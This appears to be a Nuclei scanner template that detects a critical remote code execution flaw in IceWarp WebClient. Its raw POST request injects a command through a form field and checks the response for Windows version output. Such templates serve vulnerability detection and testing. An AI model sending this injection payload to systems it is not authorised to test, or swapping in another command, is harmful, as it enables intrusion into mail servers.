id: icewarp-webclient-rce info: name: IceWarp WebClient - Remote Code Execution author: gy741 severity: critical description: | IceWarp WebClient is susceptible to remote code execution. reference: - https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 tags: icewarp,rce requests: - raw: - | POST /webmail/basic/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _dlg[captcha][target]=system(\'ver\')\ matchers-condition: and matchers: - type: word part: body words: - "Microsoft Windows [Version" - type: status status: - 302 # Enhanced by mp on 2022/05/30